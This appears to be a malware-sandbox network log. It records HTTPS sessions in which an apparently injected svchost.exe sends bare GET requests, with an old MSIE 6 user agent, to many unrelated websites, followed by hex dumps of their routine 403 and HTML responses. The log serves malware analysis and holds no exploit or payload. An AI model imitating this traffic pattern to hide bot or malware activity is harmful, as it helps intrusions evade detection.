                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                        42192.168.2.360293185.237.66.112443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                        2023-10-09 13:52:28 UTC8493OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                        Host: techtrans.de
                                                                                                                                                                                                                                                        2023-10-09 13:52:28 UTC8496INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                        Date: Mon, 09 Oct 2023 13:52:28 GMT
                                                                                                                                                                                                                                                        Server: Apache
                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                        Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                                                                                                                                        Expires: 0
                                                                                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                        Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                                        Content-Security-Policy: report-uri https://techtrans.de
                                                                                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                        Permissions-Policy: accelerometer=(), autoplay=(), camera=(), fullscreen=*, geolocation=(self), gyroscope=(), microphone=(), payment=*
                                                                                                                                                                                                                                                        Upgrade: h2,h2c
                                                                                                                                                                                                                                                        Connection: Upgrade, close
                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                        Access-Control-Allow-Methods: GET,PUT,POST,DELETE
                                                                                                                                                                                                                                                        Access-Control-Allow-Headers: Content-Type, Authorization
                                                                                                                                                                                                                                                        X-Content-Security-Policy: img-src *; media-src * data:;
                                                                                                                                                                                                                                                        X-Permitted-Cross-Domain-Policies: none
                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                        2023-10-09 13:52:28 UTC8497INData Raw: 32 63 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 27 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 27 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4e 69 6e 6a 61 46 69 72 65 77 61 6c 6c 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 43 6f 6e 74 65 6e 74 2d 54 79 70 65 27 20 63 6f 6e 74 65 6e 74 3d 27 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 27 3e 3c 2f 68 65 61 64 3e 3c 62
                                                                                                                                                                                                                                                        Data Ascii: 2c6<!DOCTYPE HTML PUBLIC '-//IETF//DTD HTML 2.0//EN'><html><head><title>NinjaFirewall 403 Forbidden</title><style>body{font-family:sans-serif;font-size:13px;color:#000;}</style><meta http-equiv='Content-Type' content='text/html; charset=utf-8'></head><b


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                        43192.168.2.360303172.67.156.49443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                        2023-10-09 13:52:28 UTC8497OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                        Host: orlyhotel.com


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                        44192.168.2.36030594.130.146.206443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                        2023-10-09 13:52:29 UTC8498OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                        Host: www.diamir.de
                                                                                                                                                                                                                                                        2023-10-09 13:52:30 UTC8498INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                        Date: Mon, 09 Oct 2023 13:52:29 GMT
                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                        Content-Length: 548
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                        2023-10-09 13:52:30 UTC8498INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20
                                                                                                                                                                                                                                                        Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                        45192.168.2.36078591.229.22.126443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                        2023-10-09 13:52:30 UTC8499OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                        Host: pleszew.policja.gov.pl
                                                                                                                                                                                                                                                        2023-10-09 13:52:30 UTC8499INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                        Date: Mon, 09 Oct 2023 13:52:36 GMT
                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                        2023-10-09 13:52:30 UTC8499INData Raw: 31 66 63 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 70 6c 22 3e 0d 0a 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 20 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 49 6e 64 65 78 2c 20 46 6f 6c 6c 6f 77 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 4b 50 50 20 50 6c 65
                                                                                                                                                                                                                                                        Data Ascii: 1fc0<!DOCTYPE html><html lang="pl"> <head> <meta charset="UTF-8"/> <meta name="description" content=" "/> <meta name="keywords" content=""/> <meta name="robots" content="Index, Follow"/> <meta name="author" content="KPP Ple
                                                                                                                                                                                                                                                        2023-10-09 13:52:31 UTC8515INData Raw: 0a 20 20 3c 2f 73 65 63 74 69 6f 6e 3e 0d 0a 3c 2f 64 69 76 3e 0d 0a 3c 21 2d 2d 20 20 74 6f 70 6e 65 77 73 2e 20 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 20 63 6f 6e 74 65 6e 74 20 20 2d 2d 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0d 0a 20 20 0d 0a 20 20 3c 21 2d 2d 20 20 63 6f 6e 74 65 6e 74 2d 6c 65 66 74 20 20 2d 2d 3e 0d 0a 20 20 3c 61 72 74 69 63 6c 65 20 69 64 3d 22 77 0d 0a 32 30 30 30 0d 0a 74 78 74 22 20 63 6c 61 73 73 3d 22 6d 61 69 6e 4c 65 66 74 22 3e 0d 0a 20 20 20 20 0d 0a 20 20 20 20 3c 21 2d 2d 20 20 61 6b 74 75 61 6c 6e 6f 73 63 69 20 20 2d 2d 3e 0d 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 61 67 6c 6f 77 65 6b 31 22 3e 3c 68 32 3e 41 6b 74 75 61 6c 6e 6f c5 9b 63 69 3c 2f 68 32 3e 0d 0a 20 20 3c 21 2d 2d 20 6f 70 63 6a 65
                                                                                                                                                                                                                                                        Data Ascii: </section></div>... topnews. -->... content --><div id="content"> ... content-left --> <article id="w2000txt" class="mainLeft"> ... aktualnosci --><div class="naglowek1"><h2>Aktualnoci</h2> ... opcje
                                                                                                                                                                                                                                                        2023-10-09 13:52:31 UTC8531INData Raw: 64 6f 70 61 6c 61 63 7a 65 2e 68 74 6d 6c 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 64 6f 70 61 6c 61 63 7a 65 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 64 6f 6b 75 6d 65 6e 74 79 2f 62 61 74 6f 6e 79 2f 33 39 36 31 2e 6a 70 67 3f 76 3d 31 36 35 37 31 31 32 36 31 38 22 20 61 6c 74 3d 22 64 6f 70 61 6c 61 63 7a 65 22 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 20 2f 3e 3c 2f 61 3e 0d 0a 31 30 30 30 0d 0a 3c 2f 64 69 76 3e 0a 09 09 0a 09 0a 09 09 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 69 74 65 6d 22 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 33 30 30 70 78 3b 20 68 65 69 67 68 74 3a 31 32 37 70 78 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 30 70 78 22 3e 3c 61 20 68 72 65 66 3d 22 2f 77
                                                                                                                                                                                                                                                        Data Ascii: dopalacze.html" target="_blank" aria-label="dopalacze"><img src="/dokumenty/batony/3961.jpg?v=1657112618" alt="dopalacze" aria-hidden="true" /></a>1000</div><div class="item" style="width:300px; height:127px;margin-bottom:10px"><a href="/w
                                                                                                                                                                                                                                                        2023-10-09 13:52:31 UTC8547INData Raw: 7a 20 73 65 72 77 69 73 75 20 4b 50 50 20 50 6c 65 73 7a 65 77 2e 3c 62 72 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 70 6f 6c 69 63 6a 61 2e 70 6c 2f 70 6f 6c 2f 77 6f 6c 6e 79 74 65 6b 73 74 2f 34 36 36 31 36 2c 64 6f 6b 2e 68 74 6d 6c 22 3e 5a 61 70 6f 7a 6e 61 6a 20 73 69 c4 99 20 7a 20 7a 61 73 61 64 61 6d 69 3c 2f 61 3e 3c 62 72 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 0d 0a 32 62 36 0d 0a 2f 70 6f 6c 69 63 6a 61 2e 70 6c 2f 70 6f 6c 2f 77 6f 6c 6e 79 74 65 6b 73 74 2f 35 39 34 38 35 2c 64 6f 6b 2e 68 74 6d 6c 22 3e 50 6f 6c 69 74 79 6b 61 20 70 72 79 77 61 74 6e 6f c5 9b 63 69 3c 2f 61 3e 0d 0a 20 20 20 20 20 20 20
                                                                                                                                                                                                                                                        Data Ascii: z serwisu KPP Pleszew.<br/> <a href="https://policja.pl/pol/wolnytekst/46616,dok.html">Zapoznaj si z zasadami</a><br/> <a href="https:/2b6/policja.pl/pol/wolnytekst/59485,dok.html">Polityka prywatnoci</a>


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                        5192.168.2.35005049.212.235.175443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                        2023-10-09 13:50:56 UTC10OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                        Host: nts-web.net
                                                                                                                                                                                                                                                        2023-10-09 13:50:56 UTC10INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                        Date: Mon, 09 Oct 2023 13:50:56 GMT
                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                        Content-Length: 2599435
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Last-Modified: Thu, 21 Sep 2023 05:40:29 GMT
                                                                                                                                                                                                                                                        ETag: "27aa0b-605d7ee086c61"
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        2023-10-09 13:50:56 UTC11INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 20 20 3c 68 65 61 64 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 20 66 62 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 2f 66 62 23 20 77 65 62 73 69 74 65 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 2f 77 65 62 73 69 74 65 23 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69
                                                                                                                                                                                                                                                        Data Ascii: <!DOCTYPE html><html lang="ja"> <head prefix="og: http://ogp.me/ns# fb: http://ogp.me/ns/fb# website: http://ogp.me/ns/website#"> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="wi
                                                                                                                                                                                                                                                        2023-10-09 13:50:56 UTC28INData Raw: 77 69 64 74 68 3a 31 2e 30 34 70 78 3b 7d 2e 63 6c 73 2d 31 36 31 2c 2e 63 6c 73 2d 31 36 32 2c 2e 63 6c 73 2d 31 36 33 7b 66 69 6c 6c 3a 23 39 32 64 31 64 37 3b 7d 2e 63 6c 73 2d 31 36 31 2c 2e 63 6c 73 2d 31 36 35 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 30 2e 39 37 70 78 3b 7d 2e 63 6c 73 2d 31 36 32 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 2e 31 35 70 78 3b 7d 2e 63 6c 73 2d 31 36 33 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 2e 32 35 70 78 3b 7d 2e 63 6c 73 2d 31 36 34 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 2e 35 34 70 78 3b 7d 2e 63 6c 73 2d 31 36 35 7b 66 69 6c 6c 3a 23 65 65 65 39 34 32 3b 7d 2e 63 6c 73 2d 31 36 36 7b 66 69 6c 6c 3a 23 65 34 38 32 37 65 3b 7d 2e 63 6c 73 2d 31 36 37 7b 66 69 6c 6c 3a 23 38 36 63 64 64 34 3b 7d 2e 63
                                                                                                                                                                                                                                                        Data Ascii: width:1.04px;}.cls-161,.cls-162,.cls-163{fill:#92d1d7;}.cls-161,.cls-165{stroke-width:0.97px;}.cls-162{stroke-width:1.15px;}.cls-163{stroke-width:1.25px;}.cls-164{stroke-width:1.54px;}.cls-165{fill:#eee942;}.cls-166{fill:#e4827e;}.cls-167{fill:#86cdd4;}.c
                                                                                                                                                                                                                                                        2023-10-09 13:50:56 UTC44INData Raw: 31 2c 2e 31 35 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 36 39 32 2e 38 33 2c 31 39 35 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 2c 32 2e 34 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 36 39 32 2e 36 2c 31 38 38 2e 31 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34
                                                                                                                                                                                                                                                        Data Ascii: 1,.15,2.86"/><path class="cls-4" d="M692.83,195a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.4,2.4,0,0,1,.51-2.88,2.25,2.25,0,0,1,2.9,0,2.12,2.12,0,0,1,.16,2.86"/><path class="cls-4" d="M692.6,188.1a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94
                                                                                                                                                                                                                                                        2023-10-09 13:50:57 UTC60INData Raw: 32 2e 38 39 2c 32 2e 32 36 2c 32 2e 32 36 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 33 2c 32 2e 31 33 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 32 33 2e 33 35 2c 32 36 33 2e 34 31 61 31 2e 37 31 2c 31 2e 37 31 2c 30 2c 30 2c 31 2d 2e 37 37 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 33 39 2c 32 2e 33 39 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 32 33 2e 31 32 2c 32 35 36 2e 34 38 61 31
                                                                                                                                                                                                                                                        Data Ascii: 2.89,2.26,2.26,0,0,1,2.9,0,2.13,2.13,0,0,1,.16,2.86"/><path class="cls-4" d="M723.35,263.41a1.71,1.71,0,0,1-.77,2.23,2.51,2.51,0,0,1-3.34-.94,2.39,2.39,0,0,1,.51-2.88,2.25,2.25,0,0,1,2.9,0,2.12,2.12,0,0,1,.15,2.86"/><path class="cls-4" d="M723.12,256.48a1
                                                                                                                                                                                                                                                        2023-10-09 13:50:57 UTC76INData Raw: 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e
                                                                                                                                                                                                                                                        Data Ascii: ,0,0,1,.51-2.89,2.
                                                                                                                                                                                                                                                        2023-10-09 13:50:57 UTC76INData Raw: 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 32 2e 38 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 35 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 35 33 2e 38 38 2c 33 33 31 2e 37 39 61 31 2e 37 33 2c 31 2e 37 33 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 35 2c 32 2e 34 2c 32 2e 34 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 33 2c 32 2e 31 33 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 35 33 2e 36 34 2c 33 32 34 2e 38 36 61 31 2e 37 31 2c 31 2e 37 31
                                                                                                                                                                                                                                                        Data Ascii: 24,2.24,0,0,1,2.89,0,2.11,2.11,0,0,1,.16,2.85"/><path class="cls-4" d="M753.88,331.79a1.73,1.73,0,0,1-.78,2.24,2.52,2.52,0,0,1-3.34-.95,2.4,2.4,0,0,1,.51-2.88,2.25,2.25,0,0,1,2.9,0,2.13,2.13,0,0,1,.16,2.86"/><path class="cls-4" d="M753.64,324.86a1.71,1.71
                                                                                                                                                                                                                                                        2023-10-09 13:50:57 UTC92INData Raw: 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 38 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 35 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 37 30 2e 37 39 2c 32 30 36 2e 32 37 61 31 2e 37 33 2c 31 2e 37 33 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 35 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 37 30 2e 35 35 2c
                                                                                                                                                                                                                                                        Data Ascii: ,1,.51-2.89,2.25,2.25,0,0,1,2.89,0,2.11,2.11,0,0,1,.16,2.85"/><path class="cls-4" d="M770.79,206.27a1.73,1.73,0,0,1-.78,2.24,2.52,2.52,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.25,2.25,0,0,1,2.9,0,2.12,2.12,0,0,1,.16,2.85"/><path class="cls-4" d="M770.55,
                                                                                                                                                                                                                                                        2023-10-09 13:50:57 UTC108INData Raw: 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 37 2c 32 2e 32 37 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 30 31 2e 33 31 2c 32 37 34 2e 36 36 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 31 2c 32 2e 34 31 2c 30 2c 30 2c 31 2c 2e 35 32 2d 32 2e 38 39 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 32 2e 38 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 35 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73
                                                                                                                                                                                                                                                        Data Ascii: 34-.94,2.42,2.42,0,0,1,.51-2.89,2.27,2.27,0,0,1,2.9,0,2.12,2.12,0,0,1,.15,2.86"/><path class="cls-4" d="M801.31,274.66a1.72,1.72,0,0,1-.78,2.23,2.52,2.52,0,0,1-3.34-.94,2.41,2.41,0,0,1,.52-2.89,2.24,2.24,0,0,1,2.89,0,2.11,2.11,0,0,1,.16,2.85"/><path class
                                                                                                                                                                                                                                                        2023-10-09 13:50:57 UTC124INData Raw: 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 2c 32 2e 34 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 33 31 2e 38 34 2c 33 34 33 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 37 2c 32 2e 32 37 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 35 22 2f 3e 3c 70
